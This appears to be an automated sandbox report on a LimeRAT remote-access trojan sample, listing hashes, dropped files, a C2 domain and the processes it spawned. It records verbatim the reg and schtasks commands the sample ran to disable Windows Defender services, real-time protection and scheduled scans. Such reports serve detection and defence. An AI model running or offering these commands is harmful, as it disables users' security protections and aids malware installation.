Malware Analysis Report

2024-11-16 13:10

Sample ID 220524-q1fgzsgdcr
Target 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
SHA256 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
Tags
limerat rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac

Threat Level: Known bad

The file 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac was found to be: Known bad.

Malicious Activity Summary

limerat rat

LimeRAT

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-24 13:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-24 13:43

Reported

2022-05-24 13:51

Platform

win7-20220414-en

Max time kernel

4s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

Signatures

LimeRAT

rat limerat

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 532 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
PID 532 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
PID 532 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
PID 532 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
PID 952 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe C:\Windows\system32\cmd.exe
PID 1408 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1408 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1408 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1408 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1408 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1408 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
CN 101.226.28.203:80 tcp
US 93.184.220.29:80 tcp
CN 101.226.28.184:80 tcp
US 204.79.197.200:443 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 magicbox3317.ddns.net udp

Files

memory/532-54-0x0000000075711000-0x0000000075713000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 2b9eee13a0e979e7cce3cbd274386be9
SHA1 f7ac238066df9d83add932190055185a59d015d2
SHA256 2b552c6f59b52970e7c86ebe757293d57af3a1f5260b52744773edb5772e0576
SHA512 038caa0f92a17f8e9b3c56cc8afcde172703f28e0f0eb76a81cacc89290055f0343b1d6d1cb777e4673550bd4f5cc8ca9a8e4bc8bd32c9bb10d47bb2767cc0ed

C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat

MD5 8760b15c6d12ecc70594fc8db876c68c
SHA1 b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA256 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA512 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee

memory/2020-65-0x0000000000000000-mapping.dmp

memory/2044-68-0x0000000000000000-mapping.dmp

memory/1628-71-0x0000000000000000-mapping.dmp

memory/1156-74-0x0000000000000000-mapping.dmp

memory/1684-78-0x0000000000000000-mapping.dmp

memory/688-79-0x0000000000000000-mapping.dmp

memory/1964-81-0x0000000000000000-mapping.dmp

memory/1772-83-0x0000000000000000-mapping.dmp

memory/1508-86-0x0000000000000000-mapping.dmp

memory/1960-89-0x0000000000000000-mapping.dmp

memory/1616-92-0x0000000000000000-mapping.dmp

memory/2028-91-0x0000000000000000-mapping.dmp

memory/1932-93-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat

MD5 76b34b8a915e15e32871820b24a60556
SHA1 aabf1487a5dc1880d5c8a6979666b215dc09a837
SHA256 ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1
SHA512 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

memory/588-97-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/904-104-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/904-107-0x0000000000940000-0x000000000095A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/1000-90-0x0000000000000000-mapping.dmp

memory/432-88-0x0000000000000000-mapping.dmp

memory/1596-87-0x0000000000000000-mapping.dmp

memory/1468-85-0x0000000000000000-mapping.dmp

memory/1812-84-0x0000000000000000-mapping.dmp

memory/1992-82-0x0000000000000000-mapping.dmp

memory/452-80-0x0000000000000000-mapping.dmp

memory/944-77-0x0000000000000000-mapping.dmp

memory/1732-76-0x0000000000000000-mapping.dmp

memory/1736-75-0x0000000000000000-mapping.dmp

memory/1196-73-0x0000000000000000-mapping.dmp

memory/1740-72-0x0000000000000000-mapping.dmp

memory/676-70-0x0000000000000000-mapping.dmp

memory/564-69-0x0000000000000000-mapping.dmp

memory/1008-67-0x0000000000000000-mapping.dmp

memory/2036-66-0x0000000000000000-mapping.dmp

memory/1272-64-0x0000000000000000-mapping.dmp

memory/1792-63-0x0000000000000000-mapping.dmp

memory/1408-61-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 b644afe28f2368af7da90246d13bce4a
SHA1 cd24a837643a47a240c7402592f47ba2e4a978b0
SHA256 e522c2e61f111716eb1b89ab6daf113c9537464f3dafc89a111e60bf6f1d84e5
SHA512 1dd0e33a4bceb3811565fc503e5d12c9bfa0f6687b94ad3232af1cd4bd092ea4759b0d82b3728f1ef203cd902ec1d5ac34fda25b167e001270524280f6a96d90

memory/952-58-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 fe4788726b2255e2aa33654f90e7f731
SHA1 da0181a736a57f57022d241e58fc6f4c25cec755
SHA256 9b0889135e08318e0f310913bac7ef86ed1af884ec460c11a66c7190195961a9
SHA512 550c50506d5adcfdf22d9c4252e8ad35ccd6eadb02a18185dd2fb7edab57a5e49c99d87ce5c7b9127d94131a71d513481cf0badd36630ed2c3e3ae6743429f33

\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 31120f8f17f419583be650465cde8f50
SHA1 fe3ea43bb6b214d4e8e32f879811f6a7016d57e5
SHA256 a7b1756b3578853214a128219c0c005959b39c7105e5eb09b4484caeb877cd61
SHA512 6b80e28890aaeb963abe721eb020ab5ea336974a6be563cb9ada5648a4db074895a42f27591429e99a57e402a587699938724a20ef60c232e6bb8475f4bfee80

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-24 13:43

Reported

2022-05-24 13:51

Platform

win10v2004-20220414-en

Max time kernel

5s

Max time network

28s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

Signatures

LimeRAT

rat limerat

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 086890d750b486ec89ca6e7edd4f2d7c
SHA1 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA256 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA512 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 086890d750b486ec89ca6e7edd4f2d7c
SHA1 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA256 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA512 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf

memory/3204-133-0x0000000000000000-mapping.dmp

memory/1268-135-0x0000000000000000-mapping.dmp

memory/4276-138-0x0000000000000000-mapping.dmp

memory/4012-143-0x0000000000000000-mapping.dmp

memory/1672-153-0x0000000000000000-mapping.dmp

memory/776-156-0x0000000000000000-mapping.dmp

memory/2352-158-0x0000000000000000-mapping.dmp

memory/736-161-0x0000000000000000-mapping.dmp

memory/232-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat

MD5 76b34b8a915e15e32871820b24a60556
SHA1 aabf1487a5dc1880d5c8a6979666b215dc09a837
SHA256 ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1
SHA512 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

memory/392-167-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/2952-170-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/324-164-0x0000000000000000-mapping.dmp

memory/2952-173-0x0000000000010000-0x000000000002A000-memory.dmp

memory/2952-174-0x0000000004960000-0x00000000049FC000-memory.dmp

memory/2684-163-0x0000000000000000-mapping.dmp

memory/2844-162-0x0000000000000000-mapping.dmp

memory/2584-160-0x0000000000000000-mapping.dmp

memory/4164-159-0x0000000000000000-mapping.dmp

memory/4392-157-0x0000000000000000-mapping.dmp

memory/4712-155-0x0000000000000000-mapping.dmp

memory/4968-154-0x0000000000000000-mapping.dmp

memory/3772-152-0x0000000000000000-mapping.dmp

memory/5104-151-0x0000000000000000-mapping.dmp

memory/4516-150-0x0000000000000000-mapping.dmp

memory/2036-149-0x0000000000000000-mapping.dmp

memory/1732-148-0x0000000000000000-mapping.dmp

memory/1348-147-0x0000000000000000-mapping.dmp

memory/552-146-0x0000000000000000-mapping.dmp

memory/2164-145-0x0000000000000000-mapping.dmp

memory/2172-144-0x0000000000000000-mapping.dmp

memory/4140-142-0x0000000000000000-mapping.dmp

memory/3592-141-0x0000000000000000-mapping.dmp

memory/4224-140-0x0000000000000000-mapping.dmp

memory/4260-139-0x0000000000000000-mapping.dmp

memory/4884-137-0x0000000000000000-mapping.dmp

memory/3404-136-0x0000000000000000-mapping.dmp

